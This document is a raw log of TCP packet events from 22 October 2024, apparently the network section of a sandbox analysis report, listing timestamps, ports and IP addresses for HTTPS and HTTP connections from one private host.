                                                                                                                  Oct 22, 2024 16:08:45.659389973 CEST4434977913.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.707370996 CEST49779443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.757894993 CEST4434977913.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.757972956 CEST4434977913.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.758352041 CEST49779443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.759813070 CEST49779443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.759828091 CEST4434977913.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.777604103 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.777640104 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.778012991 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.778661966 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.778671980 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.846807003 CEST4434978013.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.846834898 CEST4434978013.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.846843004 CEST4434978013.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.846875906 CEST4434978013.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.846916914 CEST49780443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.846924067 CEST4434978013.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.846935987 CEST4434978013.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.846946001 CEST49780443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.846961021 CEST49780443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.846993923 CEST49780443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.847021103 CEST4434978013.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.847067118 CEST49780443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.848053932 CEST49780443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.848074913 CEST4434978013.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.851902008 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.851950884 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.852093935 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.852273941 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:45.852289915 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.860253096 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.860532999 CEST49778443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:45.860553026 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.861612082 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.861665010 CEST49778443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:45.862695932 CEST49778443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:45.862778902 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.862879992 CEST49778443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:45.862889051 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:45.914424896 CEST49778443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:46.090902090 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.090960979 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.091032982 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.091111898 CEST49778443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:46.091111898 CEST49778443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:46.092092037 CEST49778443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:46.092112064 CEST44349778152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.112412930 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:46.112463951 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.112741947 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:46.113019943 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:46.113034964 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.538505077 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.538808107 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.538822889 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.539872885 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.539942026 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.540273905 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.540326118 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.540420055 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.540425062 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.585391998 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.598891973 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.599205017 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.599224091 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.600599051 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.600697994 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.601126909 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.601191998 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.601787090 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.643336058 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.648437977 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.648453951 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.696480036 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.760478020 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.760571957 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.760626078 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.761734009 CEST49782443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.761756897 CEST4434978213.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889499903 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889528990 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889538050 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889565945 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889580965 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889589071 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889662027 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.889662027 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.889684916 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889765024 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889838934 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.889887094 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.889887094 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.891180038 CEST49783443192.168.2.1613.107.253.72
                                                                                                                  Oct 22, 2024 16:08:46.891196012 CEST4434978313.107.253.72192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.161237955 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.164316893 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:47.164350986 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.165518045 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.165601015 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:47.166656017 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:47.166749001 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.166811943 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:47.166824102 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.207362890 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:47.399837971 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.399884939 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.399930954 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:47.399945974 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:47.400002956 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:47.400715113 CEST49785443192.168.2.16152.199.21.175
                                                                                                                  Oct 22, 2024 16:08:47.400729895 CEST44349785152.199.21.175192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:50.798557997 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:50.798604012 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:50.799084902 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:50.799119949 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:50.799280882 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:50.799280882 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:50.799309969 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:50.799310923 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:50.799464941 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:50.799475908 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.450313091 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.450699091 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.450712919 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.451957941 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.452033043 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.452554941 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.452578068 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.452617884 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.452788115 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.452800035 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.452903986 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.452909946 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.453859091 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.453932047 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.454231977 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.454301119 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.506392002 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.506803989 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.506833076 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.554392099 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.596642971 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.596739054 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.596801996 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.597294092 CEST49789443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.597325087 CEST44349789162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.627913952 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.671334982 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.767924070 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.768023968 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:51.768145084 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.768696070 CEST49788443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:51.768717051 CEST44349788162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:56.139832020 CEST49792443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:08:56.139893055 CEST44349792172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:56.140338898 CEST49792443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:08:56.140338898 CEST49792443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:08:56.140381098 CEST44349792172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.104459047 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:57.104522943 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.104599953 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:57.104845047 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:57.104856014 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.106355906 CEST49794443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:57.106394053 CEST44349794162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.106473923 CEST49794443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:57.106645107 CEST49794443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:57.106657982 CEST44349794162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.557857037 CEST44349792172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.558273077 CEST49792443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:08:57.558291912 CEST44349792172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.558625937 CEST44349792172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.558954000 CEST49792443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:08:57.559020042 CEST44349792172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:57.602431059 CEST49792443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:08:58.193144083 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.193764925 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.193789005 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.194196939 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.194395065 CEST44349794162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.194618940 CEST49794443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.194684029 CEST44349794162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.194858074 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.194931030 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.194993973 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.195101023 CEST44349794162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.195445061 CEST49794443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.195533991 CEST44349794162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.239330053 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.240422010 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.240422964 CEST49794443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.338964939 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.338979959 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.339104891 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.339133978 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.339198112 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.340017080 CEST49793443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:08:58.340045929 CEST44349793162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.360491991 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:58.360562086 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.360644102 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:58.360878944 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:58.360889912 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.972032070 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.972357988 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:58.972377062 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.974173069 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.974244118 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:58.976248980 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:58.976345062 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.976629972 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:58.976639032 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.021452904 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.114777088 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.114878893 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.114978075 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.115443945 CEST49796443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.115464926 CEST44349796104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.116847038 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.116882086 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.116986036 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.117201090 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.117211103 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.731776953 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.732162952 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.732187033 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.732530117 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.732920885 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.733021975 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.733059883 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.773425102 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.773442984 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.800923109 CEST49799443192.168.2.164.175.87.197
                                                                                                                  Oct 22, 2024 16:08:59.800954103 CEST443497994.175.87.197192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.801068068 CEST49799443192.168.2.164.175.87.197
                                                                                                                  Oct 22, 2024 16:08:59.801445007 CEST49799443192.168.2.164.175.87.197
                                                                                                                  Oct 22, 2024 16:08:59.801456928 CEST443497994.175.87.197192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874082088 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874130964 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874169111 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874200106 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874227047 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.874243021 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874250889 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874250889 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.874279976 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.874418020 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874468088 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.874505043 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.874514103 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.917421103 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.917439938 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.965428114 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.990885019 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.990984917 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.991028070 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.991044044 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.991775990 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.991810083 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.991841078 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.991847038 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.991885900 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.991889954 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.991935015 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:59.991966963 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:08:59.991971016 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.044725895 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.044763088 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.059587955 CEST4969880192.168.2.16199.232.210.172
                                                                                                                  Oct 22, 2024 16:09:00.059685946 CEST4970080192.168.2.16199.232.210.172
                                                                                                                  Oct 22, 2024 16:09:00.066518068 CEST8049698199.232.210.172192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.066612005 CEST4969880192.168.2.16199.232.210.172
                                                                                                                  Oct 22, 2024 16:09:00.067858934 CEST8049700199.232.210.172192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.067934990 CEST4970080192.168.2.16199.232.210.172
                                                                                                                  Oct 22, 2024 16:09:00.091475010 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.108411074 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.108517885 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.108571053 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.108588934 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.108620882 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.108673096 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.108679056 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.108716011 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.108779907 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.108783960 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.109450102 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.109500885 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.109504938 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.152054071 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.152142048 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.152158976 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.202490091 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.202517033 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.225352049 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.225383043 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.225459099 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.225472927 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.225516081 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.226703882 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.226809025 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.226855993 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.228442907 CEST49797443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.228460073 CEST44349797104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.254120111 CEST49800443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:09:00.254165888 CEST44349800104.18.95.41192.168.2.16
